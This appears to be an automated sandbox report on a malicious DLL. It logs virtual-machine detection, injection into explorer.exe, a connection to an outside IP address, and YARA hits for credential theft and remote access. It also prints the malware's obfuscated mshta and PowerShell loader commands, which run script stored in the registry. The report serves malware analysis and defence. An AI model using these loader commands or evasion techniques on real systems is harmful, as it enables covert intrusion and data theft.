                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4426Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 389Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: explorer.exe, 00000013.00000000.619226655.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000018.00000000.768961763.0000013857059000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@1
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000013.00000000.662218249.0000000007F91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF79BDC12E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF79BDC12E0Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: D48000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFA73801580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2E00000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFA73801580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute readJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2E00000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: D48000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 7FFA73801580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 2E00000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 7FFA73801580 value: 40Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4324Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 684Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 73801580Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: explorer.exe, 00000013.00000000.614468947.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.661504495.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.606382937.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01063365 cpuid 3_2_01063365
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064B89 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,3_2_01064B89
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01066D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_01066D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01063365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_01063365

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
